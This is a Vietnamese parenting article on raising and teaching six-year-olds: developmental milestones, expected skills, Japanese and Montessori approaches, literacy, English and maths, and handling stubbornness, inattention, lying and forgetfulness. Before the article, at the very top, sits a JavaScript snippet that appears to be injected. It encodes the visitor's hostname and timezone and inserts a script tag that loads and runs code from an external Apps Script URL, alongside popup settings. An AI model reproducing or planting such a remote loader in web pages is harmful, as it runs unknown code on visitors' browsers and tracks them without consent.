var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách dạy trẻ 6 tuổi: Hướng dẫn từ chuyên gia giáo dục

Trẻ 6 tuổi là giai đoạn các con kết thúc bậc học mầm non và chuyển sang bậc học tiểu học. Môi trường học tập bỗng nhiên thay đổi đến kinh ngạc. Không chỉ môi trường học thay đổi, các bạn sẽ thấy trẻ thay đổi cả về thể chất, nhận thức và thay đổi về tâm sinh lý. Ngay bây giờ, mình và các bạn cùng đi tìm hiểu cách dạy trẻ 6 tuổi phát triển thông minh và toàn diện nhé

Mời bạn nghe audio nội dung bài viết nếu không có thời gian đọc
Cách dạy trẻ 6 tuổi video tóm tắt nhanh nội dung

Đặc điểm tâm sinh lý của trẻ 6 tuổi

Các mốc phát triển tâm sinh lý của trẻ 6 tuổi

Phát triển thể chất

Khi lên 6 tuổi, sự tăng trưởng não bộ, hệ tiêu hóa, hệ hô hấp đã hoàn thiện. Trẻ mọc đủ 8 răng hàm và cũng có trẻ bắt đầu thay răng. Trong độ tuổi này, cân nặng của trẻ tăng 2- 3kg, chiều cao tăng nhanh từ 5-7cm trong một năm. Một số bạn thể hiện năng khiếu thể thao bẩm sinh.

Sự phát triển thể chất của trẻ trong giai đoạn này gắn liền với học tập, vui chơi và tập thể dục. Vì vậy mà các quý cha mẹ cần thiết lập thời gian của trẻ với điện thoại hoặc tivi, máy tính. Hầu hết ở trẻ 6 tuổi, các con đều phân biệt được trái- phải; tiếp thu kiến thức dễ dàng hơn; kiểm soát được thao tác trong kỹ năng vận động thô và vận động tinh. Đây chính là giai đoạn trẻ hoàn thiện các kỹ năng vận động (leo, chạy, nhảy, đi xe đạp 2 bánh, phối hợp hoạt động giữa tay và chân,…).

Dưới đây là gợi ý về một số hoạt động mà cha mẹ có thể giúp trẻ phát triển thể chất, hình thành thói quen thể dục thể thao lành mạnh:

  • Đảm bảo cho trẻ được hoạt động một giờ mỗi ngày.
  • Tạo các hoạt động thể chất khác nhau để trẻ tham gia cùng gia đình: đi bộ, đạp xe hoặc một số trò chơi vận động khác.
  • Cung cấp cho trẻ các bữa ăn đầy đủ chất dinh dưỡng, đừng quá quan tâm đến sở thích đồ ăn nhanh hoặc đồ ăn vặt của trẻ ở giai đoạn này. Hãy hướng dẫn trẻ rằng đồ ăn nhanh, đồ ăn ngọt không phải là bữa chính và không phải đồ ăn hàng ngày.
  • Giảm dần thời gian chơi điện tử, tiếp xúc với tivi hoặc máy tính, điện thoại của con qua các ngày.
  • Cha mẹ hãy là những người bạn, người thầy, là tấm gương sáng trong việc ăn uống lành mạnh, thể dục thể thao mỗi ngày để cả gia đình có lối sống tích cực.

Phát triển cảm xúc

Khi con lên 6 tuổi, con nhận thức rõ hơn về cảm xúc của chính mình cũng như người khác. Con bộc lộ mong muốn được tự làm một số công việc, mong muốn được bố mẹ mua cho một món quà yêu thích vào dịp lễ sinh nhật,… Cha mẹ nên khuyến khích và hướng dẫn con làm các công việc yêu thích cũng như trong việc bày tỏ quan điểm cá nhân với mọi người. Tình cảm với gia đình, xã hội, bạn bè trở nên phức tạp hơn ở lứa tuổi này. Các con nhận thức rõ hơn được thế giới xung quanh và vai trò của bản thân.

Tuy vậy, trong giai đoạn này, cảm xúc của con dễ thay đổi, có khi đang giận bạn nhưng một lúc sau lại chơi với nhau, có khi khóc cười lẫn lộn. Việc làm quen trong môi trường học tập mới, thầy cô giáo mới, bạn bè mới, việc học tập khó khăn hơn khiến trẻ e dè. Trẻ rất nhạy cảm. Nếu cô giáo hoặc bố mẹ mắng, trẻ dễ tủi thân và thấy xấu hổ với mọi người xung quanh.

Vì vậy, nếu trẻ được quan tâm, khích lệ kịp thời, trẻ sẽ vô cùng tự tin, chia sẻ được nhiều ý kiến cá nhân. Ngược lại, nếu trẻ bị chê nhiều hơn khen, so sánh trẻ với các bạn cùng trang lứa, đặt nặng vấn đề điểm số, con sẽ cảm thấy vô cùng tự ti, nhút nhát, khép mình lại, ngại chia sẻ với gia đình.

Trong giai đoạn này, thầy cô giáo cần chú ý tới cảm xúc của trẻ. Đặc biệt, người gần gũi với trẻ nhất chính là cha mẹ. Cha mẹ là người thầy tốt nhất bên cạnh con. Cha mẹ cần tâm sự, lắng nghe câu chuyện của con để con luôn cảm thấy tự tin, sống tích cực trong cuộc sống.

Phát triển nhận thức

Khi lên 6 tuổi, trẻ cắp sách tới trường, con tiếp nhận kiến thức bài bản hơn thông qua chữ viết, con số. Con nhận thức giữa đúng và sai ngày càng rõ ràng hơn. Khả năng tư duy, phân tích phức tạp phát triển thực sự từ độ tuổi này. Vì vậy, trẻ 6 tuổi rất tò mò, hay thắc mắc, thường đặt ra nhiều câu hỏi để tìm hiểu về thế giới xung quanh.

Hầu hết khi trẻ lên 6 tuổi, khả năng ngôn ngữ của con phát triển hơn. Trẻ học đọc bài độc lập, trả lời nội dung bài học, ngôn ngữ trở nên phong phú và có thể thích viết thơ, viết truyện. Khi ấy, cha mẹ hãy tiếp tục hỗ trợ con phát triển ngôn ngữ bằng cách:

  • Cùng con đọc truyện, tìm hiểu nội dung và ý nghĩa câu chuyện.
  • Mua thêm sách phù hợp với trẻ: truyện, sách về thế giới động vật,…
  • Khuyến khích các con tiếp cận, quan sát thế giới xung quanh để có cái nhìn gần gũi, thực tế để miêu tả chính xác về cuộc sống bằng ngôn ngữ của bản thân.

Phát triển tình cảm và xã hội

Trẻ 6 tuổi vẫn còn đó những ngây thơ, đáng yêu. Con như tờ giấy trắng, hồn nhiên và trong sáng. Tuy nhiên, về mặt tâm lý, có lúc con sẽ vị tha nhưng cũng có lúc con sẽ ích kỷ.

Trẻ chia sẻ với bạn đồ ăn, đồ chơi. Trẻ ghét bạn khi mình không có chiếc áo đẹp giống bạn. Nhưng cha mẹ đừng quá lo lắng, từ việc phát triển tình cảm hai chiều, cảm xúc hay tình cảm của trẻ sẽ thành thạo hơn trong việc điều tiết các mối quan hệ. Đây cũng chính là lúc cha mẹ luôn bên cạnh con, hướng dẫn con cách chia sẻ, giải quyết các tình huống, biết cách điều chỉnh cảm xúc, rèn khả năng tập trung, rèn luyện đạo đức cá nhân,…

Cột mốc phát triển quan trọng khác

Trẻ 6 tuổi đã biết chấp nhận về giới tính của mình, có hướng phát triển bản thân theo giới tính. Trẻ tò mò về cơ thể của mình, nhìn một số bộ phận trên cơ thể mình hoặc người khác và có những câu hỏi ngộ nghĩnh: Con được sinh ra như thế nào? Ai là người sinh ra con? Trong giai đoạn này, trẻ bộc lộ quan điểm cá nhân riêng tư theo giới tính. Con gái thích nhảy dây, búp bê,… Con trai lại thích ô tô, siêu nhân,… Ngoài ra, còn rất nhiều sự khác nhau giữa tâm sinh lý của bé trai và bé gái giai đoạn 6 tuổi.

Sự phát triển tâm sinh lý của bé gái 6 tuổi

Theo bảng chiều cao và cân nặng của WHO, bé gái có chiều cao và cân nặng chuẩn như sau: chiều cao 115,1cm; cân nặng 20,2kg. Nếu trẻ nhà bạn có chiều cao và cân nặng như vậy thì xin chúc mừng, bé gái gia đình bạn có sự phát triển thể chất rất tốt.

Não bộ của bé gái và bé trai phát triển theo lộ trình khác nhau, một số vùng não bộ của bé gái phát triển nhanh hơn bé trai nên bé gái ở lứa tuổi này có sự tập trung và khả năng ngôn ngữ tốt hơn các bé trai. Vì vậy, khi đi học, dù là bậc mầm non hay tiểu học thì các bạn gái thường mạnh dạn hơn so với các bạn trai nên việc diễn đạt, bộc lộ tình cảm con gái hơn hẳn con trai.

Sự phát triển tâm sinh lý của bé trai 6 tuổi

Từ nhiều nghiên cứu khác nhau, các nhà khoa học đã chỉ ra rằng từ khi còn trong bụng mẹ, các bé trai đã nghịch ngợm hơn các bé gái. Lứa tuổi này cũng vậy, bé trai hoạt động thể chất nhiều hơn, mạnh mẽ hơn, lượng thức ăn và dinh dưỡng hàng ngày nạp vào nhiều hơn bạn gái nên chiều cao, cân nặng của các bạn trai nhỉnh hơn các bạn gái một chút (chiều cao 116cm; cân nặng 20,5kg theo WHO)

Nếu khả năng ngôn ngữ của bé trai lứa tuổi này không bằng các bạn gái nhưng khả năng suy luận hay quan sát hình học của các bé trai lại tốt hơn. Các bạn trai thích các trò chơi vận động, thích chơi trò chơi liên quan đến xếp hình. Mặc dù vậy, dù là con trai hay con gái thì các con đều đáng yêu. Ở độ tuổi này, mức độ phát triển của bé gái và bé trai khác nhau nhưng đến cuối cùng, trẻ vẫn đuổi kịp nhau. Vì vậy, cha mẹ hãy yêu thương con thật nhiều và dạy dỗ con thật tốt nhé!

Các kỹ năng cần đạt của trẻ 6 tuổi

Bạn phải hiểu rằng, khi trẻ lên 6 tuổi, con bạn có khả năng đạt được rất nhiều kỹ năng. Tuy nhiên, sẽ không sao nếu như con bạn không về đích tất cả các kĩ năng. Cha mẹ hãy yên tâm và tin tưởng vào con, dù trẻ đạt được một số kĩ năng sau thì bé cũng thật tuyệt vời.

Kỹ năng vận động thô, vận động tinh

Kỹ năng vận động thô
  • Tự mặc được quần áo, đi vệ sinh không cần sự hỗ trợ
  • Tự đi được xe đạp hai bánh
  • Chạy nhảy nhịp nhàng, vượt qua được chướng ngại vật đơn giản.
  • Nhảy bằng 1 chân
  • Nhảy về phía trước bằng cả hai chân
  • Tham gia các hoạt động ngoại khóa cùng các bạn
Kỹ năng vận động tinh
  • Cầm bút thành thạo bằng 3 ngón, các ngón tay chuyển động linh hoạt.
  • Viết được các số, con chữ, từ đơn rồi đến từ phức và câu trên dòng.
  • Cầm và sử dụng kéo, cắt được gọn gàng các hình dạng xung quanh
  • Cầm và sử dụng thước, kết hợp với bút để kẻ các đường thẳng
  • Tô màu gọn gàng
  • Sử dụng linh hoạt thìa và đũa trong bữa ăn
  • Tự buộc dây giày

Nhận thức của trẻ 6 tuổi

  • So sánh và phân biệt được to/nhỏ, cao/lớn, ngắn/dài,…
  • Phân biệt được nhiều màu sắc
  • Phân biệt chính xác trái/phải
  • Sắp xếp các đồ vật theo thứ tự từ bé đến lớn và ngược lại
  • Nắm được khái niệm thời gian: hôm nay, sáng/chiều/tối, lúc nãy, ngày mai,…

Kỹ năng cá nhân, xã hội cho trẻ

  • Biết chia sẻ cảm xúc, suy nghĩ với người khác
  • Hòa đồng, thân thiện, chơi với các bạn cùng trang lứa
  • Chấp hành nội quy, kỷ luật
  • Tập trung vào hoạt động nào đó trong vòng 25- 30 phút
  • Hiểu về sự ích kỷ, lòng vị tha, lòng tự trọng, xấu hổ.

Kỹ năng ngôn ngữ cho trẻ

  • Kết hợp ghép âm/vần, đánh vần từ khi viết
  • Đọc sách, truyện phù hợp với lứa tuổi
  • Biết được số lượng qua đếm số, có thể tính đến 100
  • Dễ dàng nghe và hiểu được các câu chuyện của người lớn nói
  • Hỏi và trả lời được nhiều câu hỏi
  • Chia sẻ hoặc kể lại câu chuyện rõ ràng, mạch lạc hơn
  • Sử dụng ngôn ngữ để đưa ra các thông báo, tương tác với người khác

Cách dạy trẻ 6 tuổi

Các phương pháp dạy trẻ 6 tuổi

Cách dạy con 6 tuổi của người Nhật

Trong một lần công tác vài ngày ở Nhật Bản, mình đã rất ngỡ ngàng về các bạn nhỏ ở quốc gia mặt trời mọc này. Trẻ con ở Nhật Bản vô cùng thân thiện. Bạn sẽ dễ dàng bắt gặp các bạn nhỏ tự đeo cặp, túi xách chạy lon ton theo cha mẹ hoặc lễ phép cúi đầu xin đường khi tham gia giao thông. Sau khi trò chuyện và tìm hiểu từ một số người bạn, mình nhận thấy cách dạy con của người Nhật rất thú vị. Họ dạy con từ khi “lọt lòng”.

Đặc biệt, khi dạy trẻ 6 tuổi, giai đoạn thay đổi về tính cách, thấu hiểu được sự việc xung quanh, người Nhật sẽ dạy con bằng những cách khiến chúng ta phải thán phục. Bạn là người yêu thương con, mong muốn con phát triển toàn diện thì đừng bỏ qua những cách dạy con từ người Nhật dưới đây nhé!

  • Dạy trẻ tính kỷ luật
  • Dạy trẻ tính tự lập
  • Dạy trẻ công bằng và tôn trọng người khác
  • Đừng nên chỉ trích lỗi lầm của con
  • Tích cực cho trẻ tham gia các hoạt động ngoại khóa, hoạt động cộng đồng
  • Luôn khen ngợi khi con có những hành động tốt
  • Đừng so sánh hoặc khoe khoang về con mình
  • Không áp đặt suy nghĩ cho trẻ
  • Khuyến khích trẻ đọc sách
  • Quan tâm đến môi trường học tập của con
  • Làm gương cho con

Phương pháp Montessori

Hiện nay, ở Việt Nam, rất nhiều cha mẹ đã chọn phương pháp Montessori để nuôi dạy trẻ. Phương pháp dạy trẻ này vừa hiệu quả lại mang tính thú vị rất cao.

Trẻ ở độ tuổi này luôn đặt ra nhiều câu hỏi tò mò về các vấn đề xoay quanh cuộc sống. Đây cũng là khoảng thời gian trẻ phát triển nhanh các khái niệm về trí tuệ lẫn đạo đức. Dưới đây là một số cách dạy trẻ theo phương pháp Montessori mà cha mẹ cần tham khảo:

  • Tôn trọng trẻ; khi con tập trung làm việc gì đó thì hãy đảm bảo rằng con không bị làm phiền trong quá trình
  • Học cùng trẻ và sử dụng những hình ảnh, đồ dùng trực quan để thu hút, khơi gợi niềm hứng khởi trong học tập.
  • Không đặt nặng vấn đề điểm số, cho phép con học theo năng lực cá nhân
  • Luôn hướng trẻ học gắn liền với trải nghiệm thực tế
  • Trong các hoạt động, trẻ là trung tâm
  • Luôn khích lệ trẻ, nếu sai điều gì hãy để con tự sửa lỗi đó
  • Trẻ được tự do khám phá bản thân

Có thể bạn quan tâm: Cách dạy con theo phương pháp Montessori: Hướng dẫn A-Z chi tiết

Dạy gì cho trẻ 6 tuổi ?

Cách dạy trẻ 6 tuổi học chữ

  • Chuẩn bị góc học tập, dụng cụ và tài liệu học tập phù hợp với con
  • Hướng dẫn trẻ học thuộc bảng chữ cái, cha mẹ có thể dán bảng chữ cái ở góc học tập của con
  • Học cùng trẻ, cùng con đọc và viết chữ
  • Cho trẻ vừa học vừa chơi
  • Đọc sách, đọc truyện cùng trẻ mỗi ngày
  • Dạy trẻ qua một số ứng dụng hay phần mềm trên điện thoại hoặc tivi
  • Dạy con qua các bài thơ, đồng dao, câu vè dân gian
  • Dạy con ở bất cứ nơi đâu, bằng bất kỳ các đồ vật

Cách dạy trẻ 6 tuổi học Tiếng Anh

  • Tạo thói quen học tiếng Anh cho trẻ
  • Học qua các bài hát, đồ vật gần gũi xung quanh trẻ, trò chơi,…
  • Dạy từ các chủ đề đơn giản: số đếm (1- 10); bảng chữ cái, màu sắc,…
  • Dành thời gian học với trẻ, tương tác 1-1 với con
  • Giới thiệu thêm văn hóa tiếng Anh vào gia đình để trẻ có thêm hiểu biết và thích thú khi học tiếng Anh

Cách dạy trẻ 6 tuổi học Toán

  • Bắt đầu với số đếm và ngón tay hoặc các đồ vật xung quanh nhà
  • Chơi trò chơi liên quan đến đếm: xúc xắc, cờ cá ngựa,…
  • Xếp các đồ vật thành hàng hoặc theo thứ tự lớn bé
  • Xác định hình dạng các đồ vật đơn giản
  • Biến toán học trở thành hoạt động hàng ngày: đếm bánh cùng mẹ, chọn quả có khối lượng nặng hơn,…

Một số gợi ý khác cho trẻ 6 tuổi: Hát, diễn kịch, yoga,…

Tất cả chúng ta đều mong muốn con phát triển tốt nhất. Để trẻ luôn cảm thấy tích cực, chúng ta nên dạy trẻ cảm thấy hạnh phúc và tự tin. Vì vậy, ngoài việc dạy trẻ học Toán, Tiếng Việt, ngoại ngữ thì việc dạy trẻ học hát, múa, diễn kịch, yoga,… cũng là những lựa chọn vô cùng thú vị.

Thực tế cho thấy, có nhiều trẻ học toán hay ngoại ngữ ở mức độ bình thường nhưng khi trẻ tiếp xúc với hát hoặc vẽ hoặc diễn kịch thì con lại tiếp thu rất nhanh, làm rất tốt. Mỗi đứa trẻ đều là một nghệ sĩ nếu bạn đánh thức được tài năng của trẻ đúng cách.

Việc học múa hay yoga, dancesport giúp trẻ có nền tảng vững chắc để chơi các môn thể thao khác, có sức khỏe dẻo dai để học tập, tinh thần luôn lạc quan và thoải mái. Học vẽ giúp trẻ phát triển tư duy hình khối, phát triển khả năng tưởng tượng và sáng tạo. Âm nhạc còn giúp trẻ rèn luyện truyền đạt cảm xúc và suy nghĩ. Vì vậy cha mẹ hãy tạo điều kiện cho trẻ được học tập theo sở thích của con để con phát huy hết các khả năng của bản thân con nhé!

Dạy kỹ năng sống cho trẻ 6 tuổi

Dạy trẻ 6 tuổi tư duy

Tư duy logic là nền tảng trong việc phát triển và giải quyết vấn đề. Đứa trẻ nào càng tư duy logic thì sau này càng thành công. Việc dạy trẻ 6 tuổi tư duy là thực sự cần thiết. Tuy nhiên, mỗi độ tuổi thì sự phát triển bộ não và tư duy của mỗi đứa trẻ lại khác nhau. Vậy dạy trẻ 6 tuổi tư duy như thế nào là phù hợp? Dưới đây là một số cách dạy trẻ 6 tuổi tư duy mà cha mẹ nên lưu ý:

  • Dạy trẻ tư duy tỉ mỉ và chu đáo, không vội vàng: Điều này giúp trẻ tự nêu lên được nhưng suy nghĩ của mình. Càng tư duy tỉ mỉ, trẻ càng tập trung, trẻ càng sáng tạo và có những cách giải quyết vấn đề đúng đắn.
  • Dạy trẻ cách nghe nhạc, đọc sách: Việc này giúp trẻ phát triển não bộ rất tốt. Nghe nhạc, đọc sách giúp con rèn khả năng tập trung, phát triển khả năng nhận thức. Vì vậy, cha mẹ hãy cho trẻ tiếp xúc với những bản nhạc vui tươi, phù hợp lứa tuổi và cùng con đọc những câu chuyện thú vị.
  • Dạy trẻ tư duy từ các trò chơi: Trẻ con sẽ cực kì thích chơi đồ chơi, trò chơi. Khi chơi con vừa được vận động, vừa được tư duy logic. Một số trò chơi phát triển tư duy cho trẻ như: rubik, xếp hình, lắp ráp mô hình,…
  • Khuyến khích trẻ suy nghĩ theo những cách mới và khác biệt: Cách này giúp trẻ trau dồi kỹ năng giải quyết vấn đề sáng tạo của mình. Các câu hỏi hay đáp án của con sẽ là khác biệt, của riêng con.

Dạy trẻ 6 tuổi tự lập

Dạy trẻ tự lập không phải việc đơn giản mà cha mẹ nào cũng làm được. Đặc biệt khi trẻ vào giai đoạn 6 tuổi, con bạn chuyển sang môi trường học tập mới khác hoàn toàn so với mầm non thì việc tự lập của con là rất cần thiết. Một số cách để bạn dạy trẻ 6 tuổi tự lập bao gồm:

  • Hướng dẫn trẻ những công việc phù hợp với khả năng của trẻ: gấp quần áo cá nhân, mặc quần áo, soạn sách vở,…
  • Thiết lập quy trình: Trong buổi sáng, công việc của con cần tự làm (vệ sinh cá nhân, chải tóc, ăn sáng, đi học,…)
  • Thương lượng và thỏa hiệp: Việc này con làm được, cha mẹ sẽ có phần quà nhỏ thưởng cho trẻ. Như vậy, trẻ sẽ vô cùng thích thú.
  • Quên đi sự hoàn hảo: Khả năng làm việc của trẻ chưa được tốt lắm. Trẻ vẫn còn sự ngây thơ và vụng về. Bạn đừng chê bai gì con nhé, hãy động viên và khích lệ con. Chắc chắn rằng lần sau, với công việc tương tự, trẻ sẽ không làm bạn thất vọng.
  • Tạo môi trường an toàn, gần gũi để trẻ phát huy tính tự lập.

Một số vấn đề thường gặp của trẻ 6 tuổi

Trẻ 6 tuổi bướng bỉnh

Nguyên nhân

Trẻ đang gặp khó khăn trong việc điều chỉnh và bộc lộ cảm xúc. Cha mẹ lại gán cho trẻ rằng đó là thái độ bướng bỉnh và thậm chí sử dụng đòn roi, quát mắng để dạy trẻ. Liệu rằng bạn đã thực sự hiểu con bạn? Dưới đây là một số nguyên nhân khiến trẻ bướng bỉnh:

  • Trẻ cảm thấy uất ức khi không được bày tỏ ý kiến cá nhân
  • Cha mẹ không lắng nghe, gạt bỏ các ý kiến của trẻ
  • Trẻ bị áp đặt phải thực hiện theo suy nghĩ, lời nói của người khác.
  • Hay chê bai, so sánh trẻ với bạn đồng trang lứa.

Phương pháp

Cha mẹ cần phân biệt được trẻ bướng bỉnh và trẻ có cá tính mạnh. Những trẻ có cá tính mạnh sẽ rất sáng tạo và chủ động. Biểu hiện của trẻ bướng bỉnh bao gồm:

  • Thích gì phải đòi cha mẹ đáp ứng cho bằng được
  • Dễ nổi giận với mọi người xung quanh
  • Áp đặt suy nghĩ của mình cho người khác
  • Có thể độc lập đến mức không cần sự quan tâm của ai khác

Một số phương pháp dạy trẻ 6 tuổi vâng lời:

  • Không áp đặt, cho phép con được chọn lựa và có sự tư vấn của cha mẹ
  • Cố gắng lắng nghe, không áp đặt trẻ
  • Luôn giữ bình tĩnh và luôn tôn trọng con
  • Hợp tác với con làm các công việc
  • Giúp con điều chỉnh cảm xúc, khích lệ và động viên kịp thời
  • Tạo bầu không khí vui vẻ, thân thiện ở gia đình

Trẻ 6 tuổi kém tập trung

Nguyên nhân

Một số nguyên nhân thường gặp khiến trẻ kém tập trung bao gồm:

  • Trẻ không ngủ đủ giấc hoặc thiếu chất dinh dưỡng
  • Thời gian sử dụng thiết bị điện tử chiếm quá nhiều thời gian trong ngày
  • Thử thách không phù hợp với năng lực của trẻ
  • Bắt ép trẻ học hoặc làm gì đó quá nhiều
  • Mối quan hệ xã hội hoặc gia đình gây áp lực đến tâm lý của trẻ

Phương pháp

Như các kỹ năng khác, kém tập trung cũng sẽ cải thiện được bằng các phương pháp sau:

  • Đảm bảo rằng con bạn ngủ đủ thời gian mỗi ngày và đúng giờ giấc (7- 12 tiếng mỗi ngày), chế độ thức ăn đầy đủ chất
  • Kiểm tra sức khỏe định kỳ của bé để xem bé có thiếu hay thừa chất dinh dưỡng nào hay không
  • Chọn công việc hoặc bài tập phù hợp với năng lực của trẻ
  • Cho trẻ nghỉ giải lao, vừa học vừa chơi
  • Chú ý thời gian sử dụng thiết bị điện tử của trẻ
  • Xây dựng lòng tự trọng và kỹ năng xã hội cho trẻ để các em luôn tập trung vào công việc, không bị cô lập với mọi người.
  • Sử dụng phương pháp điều trị tâm lý kịp thời từ các bác sĩ nếu trẻ kém tập trung và mắc phải tình trạng rối loạn.

Trẻ 6 tuổi nói dối

Nguyên nhân

Trẻ em có thể học nói dối từ khi 3 tuổi. Từ 4- 6 tuổi, trẻ sẽ nói dối nhiều hơn. Càng lớn, trẻ càng nói dối giỏi hơn và người khác khó phát hiện. Vậy tại sao trẻ nói dối? Trẻ có thể nói dối do những nguyên nhân sau:

  • Cha mẹ quá nghiêm khắc nên trẻ nói dối
  • Trẻ nói dối để nâng cao lòng tự trọng vì trẻ thiếu tự tin
  • Trẻ nói dối để có được thứ mình muốn
  • Nhận thức của người lớn khác trẻ nhỏ (Ví dụ: Khi mẹ bảo trẻ quét nhà, trẻ đã quét nhà nhưng mẹ thấy bẩn, cho rằng trẻ chưa quét và mẹ bảo trẻ đang nói dối)

Phương pháp

Hành vi nói dối là hành vi sai lệch, không chuẩn mực xã hội. Nói dối nhiều sẽ tạo thành thói quen và ảnh hưởng đến sự phát triển nhân cách của trẻ. Nếu không khắc phục sớm hành vi nói dối của trẻ, lâu ngày có thể dẫn đến hành vi phạm pháp. Khi trẻ nói dối, bạn sẽ xử lý như thế nào? Hãy tham khảo một số phương pháp dưới đây và áp dụng nhé!

  • Không nổi cáu, đánh mắng khi biết trẻ nói dối. Hãy nói với trẻ rằng bạn biết sự thật không phải như vậy. Giữ bình tình và dành thời gian tâm sự với trẻ, chia sẻ cảm xúc khi bạn nhận được lời nói dối.
  • Khen ngợi khi trẻ tự nhận lỗi
  • Không lừa dối trẻ, dù là việc nhỏ nhất
  • Là chỗ dựa vững chắc cho trẻ, đảm bảo rằng trẻ được an toàn khi nói ra sự thật
  • Trở thành tấm gương sáng cho trẻ noi theo (Ví dụ: Kể câu chuyện của bản thân bạn trong một lần mắc lỗi đã nói dối và kết quả của câu chuyện đó)

Trẻ 6 tuổi hay quên

Nguyên nhân

Không chỉ ở trẻ em, hay quên là một trong số căn bệnh xảy ra ở người trưởng thành, người có tuổi,… Việc hay quên sẽ thành trở ngại lớn ảnh hưởng tới việc tư duy, học tập của trẻ. Để khắc phục được tình trạng hay quên ở trẻ 6 tuổi, cha mẹ cần nắm được các nguyên nhân gây ra hiện tượng hay quên ở trẻ

  • Có tổn thương ở não bộ (Trẻ gặp chấn thương ở phần đầu do tai nạn nào đó hoặc một số căn bệnh khác như viêm màng não, u não,… )
  • Gặp cú sốc lớn về tâm lý cũng khiến trẻ lo sợ, hay quên
  • Thiếu tập trung
  • Trẻ không nắm được cách thức để ghi nhớ
  • Trẻ ham chơi, đặc biệt là sử dụng thiết bị điện tử (tivi, điện thoại, laptop,…), thời gian chơi hơn nhiều so với thời gian học tập và trải nghiệm

Phương pháp

Bệnh hay quên liên quan tới não bộ. Để khắc phục tình trạng hay quên ở trẻ, bạn có thể áp dụng một số mẹo dưới đây:

  • Khi trẻ học bài, hãy đảm bảo con học ở không gian yên tĩnh, thoáng mát, chỉ nên có sách vở và đồ dùng học tập
  • Kiến thức phù hợp với nhận thức của trẻ
  • Cho trẻ học từng chút một, không dồn nhiều kiến thức trong một buổi học
  • Học đi đôi với thực hành
  • Sắp xếp thời gian học, nghỉ ngơi hợp lý
  • Tập hoặc chơi cùng trẻ các bài rèn luyện trí nhớ: chơi giải ô chữ, đọc sách, đố vui,…
  • Học một số kiến thức từ những bài vè, câu đối, câu nói dân gian, bài hát
  • Sử dụng giấy nhớ ở góc học tập hoặc vị trí nào đó trẻ thường xuyên nhìn thấy
  • Linh hoạt trong các phương pháp dạy trẻ
  • Đảm bảo cung cấp đủ chất cho trẻ và ngủ đủ giấc kết hợp bổ sung thực phẩm hỗ trợ bổ não có sự chỉ định của bác sĩ.

Phương pháp dạy con học ở nhà

Để nuôi dạy con thành công, ngoài việc học trên lớp thì việc học ở nhà của trẻ cũng rất quan trọng. Giờ đây, cha mẹ đều là giáo viên của chính con mình. Tất cả chúng ta đều yêu thương và hiểu về con. Tuy nhiên, việc tìm ra phương pháp dạy con học ở nhà không phải cha mẹ nào cũng sẵn có và làm đúng cách. Sau đây mình sẽ bật mí cho các bạn một số bí quyết dạy con học ở nhà đạt kết quả tốt nhất

  • Bố trí thời gian học, nghỉ ngơi hợp lý

Bạn hãy sắp xếp thời gian học của bé hợp lý để bé có thời gian nghỉ ngơi. Nghỉ ngơi giúp bé hồi phục sức khỏe, trí não sau những giờ học căng thẳng.

  • Sắp xếp góc học tập gọn gàng, cố định

Góc học tập gọn gàng góp phần quyết định đến hứng thú học tập của trẻ. Một góc học tập gọn gàng, đầy đủ đồ dùng học tập sẽ rất thu hút việc học của trẻ đó.

  • Khuyến khích con tự học, tự đọc sách,…

Tự học, tự đọc sách rèn cho trẻ thói quen tự giác. Đọc sách cung cấp cho con nhiều kiến thức, rèn khả năng tập trung.

  • Hỗ trợ trẻ khi gặp khó khăn

Khi trẻ gặp khó khăn, bạn hãy định hướng, gợi ý cách làm cho trẻ chứ đừng giúp trẻ làm toàn bộ bài tập nhé.

  • Động viên trẻ kịp thời

Bạn đừng tiếc lời khen với trẻ. Khi được khen hoặc động viên kịp thời, con sẽ rất vui mừng, từ đó càng yêu thích việc học. Bạn cũng đừng chê bai thẳng mặt con nhé. Bạn có thể góp ý với con bằng những câu từ nhẹ nhàng để con không cảm thấy chán nản.

  • Khích lệ trẻ học bằng một số món quà nhỏ

“Nếu hôm nay con làm đúng hết các bài, viết đẹp thì cuối tuần mẹ sẽ đưa con đi chơi công viên”. Chắc chắn trẻ nào khi nghe câu này cũng sẽ quyết tâm thực hiện công việc. Tuy nhiên khi bạn đã thỏa hiệp như vậy thì bạn phải thực hiện được nhé!

  • Liên lạc, phối hợp với giáo viên để nắm thêm được tình hình học tập của con để cùng cô có phương pháp dạy con tốt nhất

Bạn hãy chủ động liên lạc với giáo viên, đừng ngần ngại để hỏi thăm tình hình học tập của con ở lớp, trao đổi các phương pháp dạy trẻ để bạn và trẻ cùng đi đến thành công.

Có thể bạn quan tâm: Phương pháp Montessori là gì? Có tốt với trẻ nhỏ

Một số câu hỏi thường gặp liên quan đến sự phát triển của trẻ 6 tuổi